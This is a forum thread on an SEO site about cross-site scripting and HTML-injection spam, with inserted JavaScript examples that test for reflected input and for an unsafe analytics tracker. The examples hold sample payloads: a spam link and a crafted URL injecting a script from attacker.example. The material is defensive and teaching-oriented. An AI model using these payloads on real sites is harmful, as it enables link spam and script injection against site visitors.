Posted By: DoshDosh 74 days ago
Topic Type: News Story (Jump to http://www.mattcutts.com)
Category: SEO
4 Comments
Comments
This is the easiest and most common way to exploit a site. Always pay extra attention to your input fields. In that post is a link to a post on Google, and it gives you some of the most basic ways to check XSS input abilities on your site.
Just wish to underline the following lines of Matt's current post:
The Google security blog has written about XSS holes and exploits before and how to protect yourself. We’ve also written about protecting your site and cleaning up a hacked site before.
Either Matt thinks that everyone knows what this means, or that spelling it out will result in people who shouldn't know trying something stupid. But just because you don't know what this stuff means doesn't mean you shouldn't know how to protect yourself - a little.
For those of you who are new to the idea of cross-site scripting and HTML injection, here is a quick, easy (the easiest) example of how someone can exploit your forms and how you can test to see if your site has an issue:
First, do a search (one that produces 0 results and one that does produce results) using your internal search bar and/or leave a comment using your contact form. Does the confirmation page repeat what you searched for or put into the comment form? Do you get something like "Your search for yourkeyword produced zero results" where 'yourkeyword' has whatever you typed? OR when the comment form confirmation (or submission form confirmation in cases of directories, etc.) page comes up do you get a repeat of your message, such as "Thank you for contacting us. Your message below has been sent on to our team... Repeatofyourmessage." AND does this confirmation / search result page have its own unique URL like:
www.yourdomain.com/search.php&keyword=yoursearch ?
Now what happens when you put that keyword inside an href tag by typing it directly into the URL query string or search form? Does the text being repeated on the confirmation page have the link?
IF SO, you are in danger of someone doing this to you:
- Send a bot through the interwebs testing all the forms for an occurrence of what is described above.
- Bot finds that your site does this.
- Same bot or new bot sent back to the site to repeat this 1,000 times with 100s of different keywords each linking to a page about their penis enlargement pills, ringtones, offshore gambling site...
- Bot reports all the unique URLs back to the spammer, who then either manually or with another bot creates social web profiles, blogger.com blogs, etc... for the purpose of linking to all of these crappy search result / comment / submission confirmation URLs.
- Now Googlebot comes by, crawls the links and voila! You have pages in the index that link to Billy Bob's House of Pornophenalia.
I didn't write that to give you any ideas. I wrote it for the 100s of SEOs and webmasters out there who have heard of XSS / Cross Site Scripting, HTML Injections, etc. and don't know what they are exactly or how to test for them. This tactic is short-lived and only works for serious black-hat spammer-jammers who don't care about burning up dozens of sites for the short-term gain. It ruins the web and is arguably illegal. Again, that was the EASIEST example I could think of. Just because your site passes this test doesn't mean it's safe. Hire someone to look at it for you if you're unsure.
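The reflection test the comment above walks through, as an added example that is not part of the original post or of Matt Cutts' blog. It simulates a search confirmation page in Node.js instead of fetching a live site: the page shape, the search.php URL, the probe link and the escapeHtml helper are all assumptions made here for illustration.

```javascript
// Added example, not code from the original comment. Simulates the "put a
// keyword inside an href tag and see if it comes back as a link" check.

// Constructed probe: the kind of link a spam bot would submit as the keyword.
const PROBE = '<a href="http://attacker.example/pills">cheap pills</a>';

// Minimal HTML escaping for text nodes and double-quoted attribute values
// (hypothetical helper; use your framework's escaper in production).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable confirmation page: echoes the keyword straight into the markup.
function renderSearchVulnerable(keyword, hits) {
  return `<p>Your search for ${keyword} produced ${hits} results</p>`;
}

// Hardened version: same page, but the keyword is HTML-escaped before it
// reaches the template, so the probe is shown as text rather than a live link.
function renderSearchHardened(keyword, hits) {
  return `<p>Your search for ${escapeHtml(keyword)} produced ${hits} results</p>`;
}

// Build the GET URL a bot would request (hypothetical search.php endpoint).
// URLSearchParams percent-encodes the probe so the server sees it intact.
function buildProbeUrl(base, keyword) {
  const u = new URL(base);
  u.searchParams.set('keyword', keyword);
  return u.toString();
}

// Classify how the probe came back in the response body:
//   'raw'     - markup survived intact: HTML injection works, the link is live
//   'escaped' - text came back but angle brackets were neutralised
//   'none'    - input not reflected at all
function classifyReflection(body, probe) {
  if (body.includes(probe)) return 'raw';
  if (body.includes(escapeHtml(probe))) return 'escaped';
  return 'none';
}

// Run the check against both page variants, for a zero-result and a hit search,
// since the comment suggests trying both.
function runReflectionTest() {
  const results = {};
  for (const hits of [0, 12]) {
    results[`vulnerable_${hits}`] =
      classifyReflection(renderSearchVulnerable(PROBE, hits), PROBE);
    results[`hardened_${hits}`] =
      classifyReflection(renderSearchHardened(PROBE, hits), PROBE);
  }
  return results;
}

console.log(buildProbeUrl('http://www.yourdomain.com/search.php', PROBE));
console.log(runReflectionTest());
```

Run it with `node`. A result of 'raw' is the failing case the comment describes: the injected anchor is part of the page, and every URL the bot generates becomes a crawlable page linking to the spammer. To test a real site, replace the render functions with an HTTP fetch of the confirmation page and feed the body to classifyReflection. As the comment says, 'escaped' on this one probe does not make the site safe; it only means this particular reflection point escapes angle brackets in this particular context.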
It's good advice to check your search box for XSS holes, but to be honest these days I don't actually see this as the biggest problem. The biggest problem is all the sites that think they did a perfect job in removing all XSS holes on their site - and they did, and then some fool from marketing throws on a web analytics script that includes a totally unprotected grabbing of the target URL ... and then you have no security left! :)
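An added example of the analytics-script hole the comment above describes, not code from the commenter or from any real analytics vendor: a tracker that builds its beacon image tag from the page URL. The stats.example endpoint, the attacker URL and the function names are hypothetical, and the page URL is passed in as a parameter in place of location.href so the snippet runs offline in Node.js.

```javascript
// Added example, not code from the original comment. Shows a third-party
// tracker that reflects the page URL into markup, beside a hardened version.

// Minimal HTML escaping for attribute values (hypothetical helper).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable tracker: the raw URL is concatenated into a src attribute.
// In the browser pageUrl would be location.href and the string would go
// through document.write or innerHTML.
function trackerSnippetVulnerable(pageUrl) {
  return '<img src="http://stats.example/p.gif?u=' + pageUrl + '" alt="">';
}

// Hardened tracker: two contexts, two encoders. The URL is percent-encoded as
// a query value, then the whole beacon URL is HTML-escaped before it is placed
// inside an attribute.
function trackerSnippetHardened(pageUrl) {
  const beacon = 'http://stats.example/p.gif?u=' + encodeURIComponent(pageUrl);
  return '<img src="' + escapeHtml(beacon) + '" alt="">';
}

// Crude structural check: a well-formed <img src="..." alt=""> carries exactly
// four double quotes and one '<'. Anything else means the value closed the
// attribute or the tag and injected markup of its own.
function breaksOutOfAttribute(snippet) {
  const quotes = (snippet.match(/"/g) || []).length;
  const openers = (snippet.match(/</g) || []).length;
  return quotes !== 4 || openers !== 1;
}

// Constructed URL an attacker would link to from elsewhere on the web. Whether a
// browser percent-encodes quotes and angle brackets in location.href varies by
// browser and URL component, so the script must not rely on it.
const EVIL_URL =
  'http://www.yourdomain.com/page?x="><script src="http://attacker.example/x.js"></script>';
const BENIGN_URL = 'http://www.yourdomain.com/page';

function demo() {
  return {
    vulnerable: breaksOutOfAttribute(trackerSnippetVulnerable(EVIL_URL)),
    hardened: breaksOutOfAttribute(trackerSnippetHardened(EVIL_URL)),
    benign: breaksOutOfAttribute(trackerSnippetVulnerable(BENIGN_URL)),
  };
}

console.log(trackerSnippetVulnerable(EVIL_URL));
console.log(trackerSnippetHardened(EVIL_URL));
console.log(demo());
```

The point of the comment is that the server-side escaping is irrelevant here: the hole lives in a script the site did not write, executing in the page's origin, so reviewing third-party tags before they go live matters as much as auditing your own forms.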